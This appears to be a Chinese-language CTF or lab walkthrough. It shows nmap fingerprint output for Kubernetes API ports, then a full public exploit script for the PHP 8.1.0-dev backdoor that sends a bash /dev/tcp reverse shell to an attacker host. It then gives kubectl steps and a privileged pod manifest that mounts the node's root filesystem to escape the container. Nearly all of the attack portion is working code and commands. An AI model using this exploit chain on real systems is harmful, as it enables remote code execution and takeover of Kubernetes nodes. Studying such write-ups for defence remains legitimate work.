SF:8\x20Mar\x202024\x2008:33:38\x20GMT\r\nContent-Length:\x20189\r\n\r\n{\
SF:"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"F
SF:ailure\",\"message\":\"forbidden:\x20User\x20\\\"system:anonymous\\\"\x
SF:20cannot\x20options\x20path\x20\\\"/\\\"\",\"reason\":\"Forbidden\",\"d
SF:etails\":{},\"code\":403}\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnect
SF:ion:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x2040
SF:0\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\
SF:nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67
SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x2
SF:0charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r
SF:(TerminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
SF:00\x20Bad\x20Request")%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\
SF:x20close\r\n\r\n400\x20Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400
SF:\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n
SF:Connection:\x20close\r\n\r\n400\x20Bad\x20Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port16443-TCP:V=7.94SVN%T=SSL%I=7%D=3/8%Time=65EACD5E%P=aarch64-unknown
SF:-linux-gnu%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
SF:r\n400\x20Bad\x20Request")%r(GetRequest,14A,"HTTP/1\.0\x20401\x20Unauth
SF:orized\r\nAudit-Id:\x20909e8f4e-2741-42e1-96e2-4f0cfa303a35\r\nCache-Co
SF:ntrol:\x20no-cache,\x20private\r\nContent-Type:\x20application/json\r\n
SF:Date:\x20Fri,\x2008\x20Mar\x202024\x2008:33:35\x20GMT\r\nContent-Length
SF::\x20129\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\"
SF::{},\"status\":\"Failure\",\"message\":\"Unauthorized\",\"reason\":\"Un
SF:authorized\",\"code\":401}\n")%r(HTTPOptions,14A,"HTTP/1\.0\x20401\x20U
SF:nauthorized\r\nAudit-Id:\x200b811fb7-663d-4fb7-b0e3-a1d21fb1914d\r\nCac
SF:he-Control:\x20no-cache,\x20private\r\nContent-Type:\x20application/jso
SF:n\r\nDate:\x20Fri,\x2008\x20Mar\x202024\x2008:33:37\x20GMT\r\nContent-L
SF:ength:\x20129\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"v1\",\"metad
SF:ata\":{},\"status\":\"Failure\",\"message\":\"Unauthorized\",\"reason\"
SF::\"Unauthorized\",\"code\":401}\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\
SF:x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nC
SF:onnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=ut
SF:f-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(SSLSession
SF:Req,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pla
SF:in;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reque
SF:st")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\
SF:n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Ba
SF:d\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnec
SF:tion:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\
SF:x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf
SF:-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(FourOhFourR
SF:equest,14A,"HTTP/1\.0\x20401\x20Unauthorized\r\nAudit-Id:\x201707969f-c
SF:859-441e-8002-5b41ce0aa55d\r\nCache-Control:\x20no-cache,\x20private\r\
SF:nContent-Type:\x20application/json\r\nDate:\x20Fri,\x2008\x20Mar\x20202
SF:4\x2008:34:19\x20GMT\r\nContent-Length:\x20129\r\n\r\n{\"kind\":\"Statu
SF:s\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"mess
SF:age\":\"Unauthorized\",\"reason\":\"Unauthorized\",\"code\":401}\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.75 seconds
           Raw packets sent: 11 (460B) | Rcvd: 8 (348B)


…还得是github
python poc.py http://10.10.182.202:30679/ 10.17.6.173 9999

脚本放这里了

# Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link: 
#     - https://hub.docker.com/r/phpdaily/php
#     - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# CVE : N/A
# References:
#     - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
#     - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.

Usage:
  python3 revshell_php_8.1.0-dev.py <target-ip> <attacker-ip> <attacker-port>
"""

#!/usr/bin/env python3
import os, sys, argparse, requests

request = requests.Session()

def check_target(args):
    response = request.get(args.url)
    for header in response.headers.items():
        if "PHP/8.1.0-dev" in header[1]:
            return True
    return False

def reverse_shell(args):
    payload = 'bash -c \"bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\"'
    injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)

def main(): 
    parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp <attacker PORT>")
    parser.add_argument("url", metavar='<target URL>', help="Target URL")
    parser.add_argument("lhost", metavar='<attacker IP>', help="Attacker listening IP",)
    parser.add_argument("lport", metavar='<attacker PORT>', help="Attacker listening port")
    args = parser.parse_args()
    if check_target(args):
        reverse_shell(args)
    else:
        print("Host is not available or vulnerable, aborting...")
        exit
    
if __name__ == "__main__":
    main()

反弹上去了

upload /Path/to/kubectl /tmp/kubectl

用pwncat-cs就能传文件了
传的有点慢

(remote) root@php-deploy-6d998f68b9-wlslz:/tmp# ./kubectl auth can-i --list
Resources   Non-Resource URLs   Resource Names   Verbs
*.*         []                  []               [*]
            [*]                 []               [*]

看到有任意资源的任意verb权限

./kubectl get node -o yaml
找到image的名字

编写yaml

apiVersion: v1
kind: Pod
metadata:
  name: pwned
  labels:
    app: pwn
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: pwned
    image: docker.io/vulhub/php:8.1-backdoor
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /

./kubectl apply -f pwn.yaml挂载他

./kubectl get pods 确保运行

./kubectl exec -it pwned -- /bin/sh getshell